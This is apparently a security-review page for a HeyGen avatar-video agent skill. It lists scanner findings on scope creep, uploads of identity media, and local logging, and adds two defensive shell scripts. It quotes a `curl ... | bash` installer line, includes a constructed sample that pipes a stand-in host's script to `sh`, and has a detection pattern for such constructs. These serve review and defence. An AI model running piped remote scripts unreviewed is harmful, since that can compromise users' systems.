Hg Skills Republish 221

Security checks across malware telemetry and agentic risk

Overview

The skill appears purpose-built for HeyGen avatar and video creation, but it should be reviewed because it handles identity media, credentials, paid account actions, persistent local profile/log files, and remote uploads with incomplete privacy and control guidance.

Review before installing:
  • Use it only with a HeyGen account you intend to grant video/avatar access to.
  • Do not use third-party faces or voices without permission.
  • Do not provide confidential documents unless you are comfortable sending them to HeyGen.
  • Prefer MCP/OAuth or a scoped API key.
  • Inspect the CLI installer before running it.
  • Periodically delete AVATAR files and heygen-video-log.jsonl if you do not want that identity and generation history retained locally.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (25)

Context-Inappropriate Capability

Severity: Medium
Confidence: 89%
Finding
The file embeds detailed eval-runner instructions for reporting results into a specific Notion database, which is outside the stated HeyGen avatar/video functionality. In an agent skill, this expands operational scope and can cause the agent to write data to an unrelated external system, increasing the risk of unintended data exfiltration or unauthorized actions during evaluation or misuse.

Context-Inappropriate Capability

Severity: Medium
Confidence: 88%
Finding
The install guide instructs the agent to read workspace-wide identity files like SOUL.md and IDENTITY.md and to write a persistent AVATAR-<NAME>.md artifact. That expands the skill's access beyond HeyGen setup into unrelated local context and creates durable identity state, which can expose sensitive workspace information or cause the agent to act on non-essential files during installation.

Context-Inappropriate Capability

Severity: Medium
Confidence: 90%
Finding
The skill expands from HeyGen video generation into delivery via an external message tool, including downloading the MP4 locally and transmitting it elsewhere. That broadens data flow beyond the declared purpose and tool scope, increasing the chance of unintended exfiltration of generated media or delivery to the wrong destination.

Description-Behavior Mismatch

Severity: Medium
Confidence: 88%
Finding
The top-level behavior description understates what the skill actually does: it not only returns share/session URLs, but also downloads videos locally, sends them through another tool, and writes logs. This kind of capability mismatch is dangerous because reviewers and users may grant trust or permissions based on incomplete documentation, while the skill performs additional data-handling actions.

Intent-Code Divergence

Severity: High
Confidence: 95%
Finding
The Frame Check section claims it does not generate images or create new looks, yet its framing notes instruct use of an AI Image tool for generative fill. That contradiction undermines operator expectations and can cause unreviewed synthetic image generation or transformation of user likeness/backgrounds under a supposedly non-generative step.

Intent-Code Divergence

Severity: Medium
Confidence: 95%
Finding
The document claims the step does not generate images or create new looks, yet the appended prompt explicitly instructs the downstream Video Agent to use an AI Image tool for generative fill. This mismatch can mislead operators and bypass safeguards or user expectations, causing unreviewed image synthesis and background alteration despite the stated restriction.

Missing User Warnings

Severity: Low
Confidence: 72%
Finding
The documentation instructs use of persistent local credentials and environment-variable API keys without warning about secret handling, storage location, or leakage risks. In agent environments, this can normalize unsafe credential practices, leading to accidental exposure through logs, shared shells, home-directory persistence, or inherited subprocess environments.

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The installation instructions tell users to execute a remote script directly via `curl ... | bash`, which removes the opportunity to inspect the downloaded code before execution. In an agent skill context, this is more dangerous because it normalizes unattended code execution from a network source and could lead to full compromise of the user environment if the host, transport, or script source is ever abused.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The first-run prompt encourages an agent to install software and export an API key automatically, without any warning about executing unreviewed code or handling sensitive credentials. In this skill context, that increases risk because the text is designed to be pasted into an agent workflow, potentially causing an agent to fetch code and manipulate secrets with minimal user review.

Natural-Language Policy Violations

Severity: Medium
Confidence: 83%
Finding
The guide biases the workflow toward creating an avatar for the agent by default rather than requiring explicit user intent. In a skill that can generate identity-bearing media, defaulting to identity creation can lead to unexpected profile creation, misuse of user credits, and generation of persistent persona artifacts the user did not clearly request.

Missing User Warnings

Severity: Medium
Confidence: 93%
Finding
The README instructs users to create a persistent digital twin from a photo and voice and store reusable avatar state, but it does not prominently require informed consent, ownership verification, or disclosure of retention/privacy implications. In a skill specifically designed for identity-first video generation, this omission increases the risk of unauthorized cloning, impersonation, and privacy harm.

Missing User Warnings

Severity: Medium
Confidence: 89%
Finding
The README advertises turning article URLs and PDFs into videos, but it does not clearly warn that the supplied content may be fetched, processed, and transmitted to external services such as HeyGen or related tooling. This can lead users to expose confidential documents, internal URLs, or sensitive content without realizing it leaves the local environment.

Missing User Warnings

Severity: Low
Confidence: 77%
Finding
The skill performs remote uploads to HeyGen and local logging while relying on `HEYGEN_API_KEY`, but it does not clearly warn users that provided media, identity files, and generated metadata may be transmitted to a third party and persisted locally. In a skill that handles personal photos, digital twins, and voice/avatar creation, insufficient disclosure increases the risk of accidental exposure of sensitive personal or biometric data.

Vague Triggers

Severity: Medium
Confidence: 88%
Finding
The trigger examples are broad and the workflow explicitly defaults ambiguous avatar-related requests to invocation, which can cause the skill to activate and act on loosely related prompts without clear user intent. In this skill, that matters because activation can lead to reading identity files, persisting profile data, and potentially creating external account resources, making unintended invocation materially risky.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The skill instructs writing persistent `AVATAR-<NAME>.md` files containing appearance, voice, and service identifiers without any user-facing disclosure that this identity data will be stored in the workspace. This creates a privacy and data-retention risk because sensitive personal descriptors may be saved locally by default, potentially exposing them to other tools, collaborators, or future sessions.

Missing User Warnings

Severity: High
Confidence: 98%
Finding
The skill encourages photo upload and accepts public image URLs for real-person avatar creation without warning the user that biometric-like facial data will be transmitted to a third-party service and may be retained or reused under that service's policies. Because this involves highly sensitive identity data and external transfer, the missing notice and consent flow materially increases privacy and compliance risk.

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The skill instructs persistent logging of detailed generation metadata, including topic, video/session IDs, avatar/voice/style identifiers, orientation, and concerns, without any notice or consent mechanism in the file. This creates a privacy and data-retention risk, especially if topics contain sensitive business, personal, or campaign content and logs are stored insecurely or longer than necessary.

Missing User Warnings

Severity: Low
Confidence: 81%
Finding
The skill instructs the agent to record asset-classification metadata in a learning log without any guidance to disclose this logging to the user or minimize what is stored. Even if the example fields seem limited, asset metadata can reveal sensitive details about user files, internal resources, or workflow context, creating a quiet privacy and data-governance risk.

Missing User Warnings

Severity: Medium
Confidence: 90%
Finding
The skill instructs the agent to display `preview_image_url` inline, which can cause the client to fetch third-party media directly without informing the user. That may expose IP address, user-agent, timing metadata, and the existence of private avatar assets to an external service, which is especially relevant in a workflow centered on private avatars.

Missing User Warnings

Severity: Medium
Confidence: 93%
Finding
The guidance says to always share playable voice previews and, if missing, generate a TTS sample, but it does not warn that this fetches remote audio or sends sample text to HeyGen for processing. In practice, users may unknowingly disclose text content and trigger outbound network access when evaluating voices.

Missing User Warnings

Severity: High
Confidence: 98%
Finding
This section describes uploading user photos and videos to create avatars and digital twins without any privacy or sensitivity warning. Because the content involves biometric-like personal media and identity recreation, users could unintentionally send highly sensitive images/videos to a third-party service, creating substantial privacy, consent, and misuse risks.

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The direct-image flow tells the agent to pass `image_url` or `image_asset_id` to create a video but omits that the image will be transmitted to an external provider for processing. That can lead to unintended disclosure of personal photos or internal asset references, particularly because this path is framed as the 'simplest' and 'fastest' option.

Vague Triggers

Severity: Medium
Confidence: 73%
Finding
Broad activation guidance can cause the skill to trigger for loosely related requests, expanding the skill's operational scope beyond what the user intended. In an agent setting, over-broad routing can mis-handle requests, inject irrelevant directives, or cause calls into HeyGen-oriented workflows when a simpler or different tool should have been used.

Ssd 3

Severity: Medium
Confidence: 96%
Finding
Persisting detailed per-run metadata in a local JSONL file creates a durable record of user requests and generated assets that could be exposed through host compromise, backups, shared workspaces, or later misuse. Because the log includes user-provided topic text and identifiers tied to media generation, the skill context makes this more dangerous than ephemeral runtime state.
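
The logging and retention findings above (the per-run JSONL metadata, the `AVATAR-<NAME>.md` profile files) and the overview's advice to periodically delete those files both come down to one practical question: what exactly is sitting in the workspace, and how do I minimize or remove it. The script below is an added example written for this review, not the skill's own code. The file names `AVATAR-<NAME>.md` and `heygen-video-log.jsonl` are taken from the report; the record fields in the constructed sample log (`topic`, `concerns`, `video_id`, and so on) are assumptions about the schema, not the skill's real one, so adjust `SENSITIVE_KEYS` to whatever your copy of the log actually contains.

```shell
#!/usr/bin/env bash
# Added example (not the skill's own code): inventory, scrub, and purge the local state
# the findings describe: AVATAR-<NAME>.md profile files and heygen-video-log.jsonl.
# The record fields in the constructed sample log are assumptions, not the skill's schema.
set -u

LOG_NAME="heygen-video-log.jsonl"

# Free-text fields that carry user content and deserve scrubbing before the log is
# shared, backed up, or kept past the job (assumed names, based on the findings' wording).
SENSITIVE_KEYS="topic concerns"

# Build a sample workspace so the audit runs offline. Constructed data.
write_sample_workspace() {   # write_sample_workspace DIR
  cat > "$1/AVATAR-Ava.md" <<'EOF'
# AVATAR-Ava
appearance: short dark hair, grey blazer
voice_id: voice_demo_123
avatar_id: avatar_demo_456
EOF
  cat > "$1/$LOG_NAME" <<'EOF'
{"ts":"2024-01-01T10:00:00Z","topic":"Q3 board deck walkthrough","video_id":"vid_demo_1","avatar_id":"avatar_demo_456","orientation":"landscape"}
{"ts":"2024-01-02T11:30:00Z","topic":"customer churn root cause","video_id":"vid_demo_2","avatar_id":"avatar_demo_456","concerns":"mentions unreleased pricing"}
EOF
}

count_avatar_files() {       # count_avatar_files DIR ; number of AVATAR-*.md files
  find "$1" -maxdepth 2 -type f -name 'AVATAR-*.md' | wc -l | tr -d ' '
}

count_log_records() {        # count_log_records DIR ; non-empty JSONL lines, 0 if no log
  if [ -f "$1/$LOG_NAME" ]; then grep -c . "$1/$LOG_NAME" || true; else echo 0; fi
}

log_keys() {                 # log_keys DIR ; distinct top-level keys, space separated
  [ -f "$1/$LOG_NAME" ] || return 0
  grep -oE '"[A-Za-z_]+":' "$1/$LOG_NAME" | tr -d '":' | sort -u | tr '\n' ' '
}

sensitive_keys_present() {   # sensitive_keys_present DIR ; prints the sensitive keys found
  local k found=""
  for k in $SENSITIVE_KEYS; do
    case " $(log_keys "$1") " in *" $k "*) found="$found$k ";; esac
  done
  printf '%s' "${found% }"
}

# Drop the free-text fields but keep the identifiers needed to find the generated video
# again; a minimal log is safer to retain than the full one. String values only.
scrub_log() {                # scrub_log DIR ; rewrites the log in place
  local log="$1/$LOG_NAME" tmp k
  [ -f "$log" ] || return 0
  tmp=$(mktemp)
  cp "$log" "$tmp"
  for k in $SENSITIVE_KEYS; do
    # remove `"key":"value",` or a trailing `,"key":"value"` so the JSON stays valid
    sed -E -i.bak "s/\"$k\":\"[^\"]*\",//g; s/,\"$k\":\"[^\"]*\"//g" "$tmp"
  done
  mv "$tmp" "$log"; rm -f "$tmp.bak"
}

purge_retained_state() {     # purge_retained_state DIR ; the overview's advice as a command
  find "$1" -maxdepth 2 -type f -name 'AVATAR-*.md' -exec rm -f {} +
  rm -f "$1/$LOG_NAME"
}

audit_retained_state() {     # audit_retained_state DIR ; one-screen summary for the user
  printf 'avatar profiles: %s\n' "$(count_avatar_files "$1")"
  printf 'log records:     %s\n' "$(count_log_records "$1")"
  printf 'log keys:        %s\n' "$(log_keys "$1")"
  printf 'sensitive keys:  %s\n' "$(sensitive_keys_present "$1")"
}

# Usage: audit first, scrub if you keep the log, purge when the identity should not persist.
#   write_sample_workspace /tmp/ws    # constructed data; point the others at a real workspace
#   audit_retained_state /tmp/ws; scrub_log /tmp/ws; purge_retained_state /tmp/ws
```

The scrub keeps `video_id` and `avatar_id` so a generated video can still be located on the HeyGen side, and removes only the free-text fields that would leak what the video was about if the workspace is backed up or shared. Purge is the right answer when the avatar itself should not outlive the session.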

External Script Fetching

Severity: High
Category: Supply Chain
Content
2. **CLI mode (API-key override)** — If `HEYGEN_API_KEY` is set in the environment AND `heygen --version` exits 0, use CLI. API-key presence is an explicit user signal that they want direct API access; it short-circuits MCP detection. No question asked.
3. **MCP mode** — No `HEYGEN_API_KEY` set AND HeyGen MCP tools are visible in the toolset (tools matching `mcp__heygen__*`). OAuth auth, uses existing plan credits.
4. **CLI mode (fallback)** — MCP tools NOT available AND `heygen --version` exits 0. Auth via `heygen auth login` (persists to `~/.heygen/credentials`).
5. **Neither** — tell the user once: "To use this skill, connect the HeyGen MCP server or install the HeyGen CLI: `curl -fsSL https://static.heygen.ai/cli/install.sh | bash` then `heygen auth login`."

**Hard rules:**
- **Never call `curl api.heygen.com/...`** — every mode routes through its own surface.
Confidence: 93%
Finding
curl -fsSL https://static.heygen.ai/cli/install.sh | bash
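
The install line quoted above, and the earlier Missing User Warnings finding about `curl ... | bash`, describe the same weakness: the script executes before anyone can read it, and there is nothing tying the run to a version that was reviewed. The script below is an added example written for this review; it is not HeyGen's installer and not the skill's code. It splits the one-liner into fetch, pin, inspect, and run, and fails closed on a digest mismatch or on constructs a reviewer would want to see. The sample installer scripts it writes are constructed for the demonstration; the real URL is only shown in the usage comment, and the digest you pin must be one you recorded yourself after reading the downloaded file.

```shell
#!/usr/bin/env bash
# Added example (not HeyGen's installer and not the skill's code): the fetch, pin,
# inspect, run flow that replaces `curl -fsSL <url> | bash`. The sample installer
# scripts below are constructed for the demonstration.
set -u

sha256_of() {            # sha256_of FILE ; hex digest, works on GNU and BSD userland
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Step 1: land the script in a file. Nothing executes yet.
fetch_installer() {      # fetch_installer URL DEST
  curl -fsSL --proto '=https' --tlsv1.2 -o "$2" "$1"
}

# Step 2: compare against the digest recorded when a human last reviewed the script.
# A changed upstream file, benign or not, fails closed until someone re-reviews it.
verify_installer() {     # verify_installer FILE EXPECTED_SHA256 ; 0 on match
  [ "$(sha256_of "$1")" = "$2" ]
}

# Step 3: surface the constructs a reviewer wants to see before granting execution:
# a nested remote fetch piped to a shell, eval, decoded blobs, sudo, shell rc edits.
scan_installer() {       # scan_installer FILE ; 0 if clean, 1 with the hits on stderr
  local hits
  hits=$(grep -nE '(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh|(^|[^[:alnum:]_])eval[[:space:]]|base64[[:space:]]+(-d|--decode)|(^|[[:space:]])sudo[[:space:]]|\.(bashrc|zshrc|profile)' "$1" || true)
  [ -z "$hits" ] && return 0
  printf 'review before running %s:\n%s\n' "$1" "$hits" >&2
  return 1
}

# Step 4: execute only a file that passed both checks, with an explicit interpreter.
run_installer() {        # run_installer FILE EXPECTED_SHA256
  verify_installer "$1" "$2" || { echo "digest mismatch, refusing $1" >&2; return 1; }
  scan_installer "$1"    || { echo "scan flagged $1, inspect it then re-run" >&2; return 1; }
  bash "$1"
}

# Constructed sample installers: one benign, one that itself does a blind curl|sh.
write_samples() {        # write_samples DIR
  cat > "$1/ok.sh" <<'EOF'
#!/bin/sh
echo "installing demo cli"
EOF
  cat > "$1/bad.sh" <<'EOF'
#!/bin/sh
# the pattern the finding flags, one level down where nobody is looking
curl -fsSL https://example.invalid/stage2.sh | sh
EOF
}

# Usage against the real thing: fetch first, read it, then pin the digest you reviewed.
#   fetch_installer https://static.heygen.ai/cli/install.sh ./install.sh
#   less ./install.sh && sha256_of ./install.sh     # record this as the reviewed digest
#   run_installer ./install.sh <reviewed_digest>
```

The scan is a reviewer's aid, not an allowlist: a hit means a human reads that line, it does not mean the script is malicious, and a clean scan does not replace reading the file once. The pinned digest is what turns a one-time review into a durable control, since any later change upstream stops the install until it is reviewed again.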

VirusTotal

65/65 vendors flagged this skill as clean.
